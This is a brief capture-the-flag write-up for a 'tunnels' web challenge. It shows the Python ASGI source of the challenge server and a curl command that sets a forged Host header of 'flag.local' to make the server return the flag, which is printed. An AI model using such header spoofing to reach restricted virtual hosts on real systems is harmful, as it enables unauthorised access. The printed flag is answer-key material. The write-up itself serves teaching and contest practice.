Description
Welcome to the tunnels!! Have fun!
Approach
We are provided with a website along with its source code.
Here is the Source Code:
# run via `uvicorn app:app --port 6000`
import os
SECRET_SITE = b"flag.local"
FLAG = os.environ['FLAG']
async def app(scope, receive, send):
assert scope['type'] == 'http'
headers = scope['headers']
await send({
'type': 'http.response.start',
'status': 200,
'headers': [
[b'content-type', b'text/plain'],
],
})
# IDK malformed requests or something
num_hosts = 0
for name, value in headers:
if name == b"host":
num_hosts += 1
if num_hosts == 1:
for name, value in headers:
if name == b"host" and value == SECRET_SITE:
await send({
'type': 'http.response.body',
'body': FLAG.encode(),
})
return
await send({
'type': 'http.response.body',
'body': b'Welcome to the _tunnel_. Watch your step!!',
})
By examining the source code, we can observe that the flag is stored as an environment variable and can be accessed if the condition if name == b"host" and value == SECRET_SITE: is satisfied.
To trigger the server to reveal the flag, we need to provide a single header with the name host and the value flag.local. Once the server receives this header, it will return the flag in response.
┌──(kali㉿iasad)-[~/CTFs/angstorm]
└─$ curl -H "Host: flag.local" https://pioneer.tailec718.ts.net/
actf{reaching_the_core__chapter_8}
Flag: actf{reaching_the_core__chapter_8}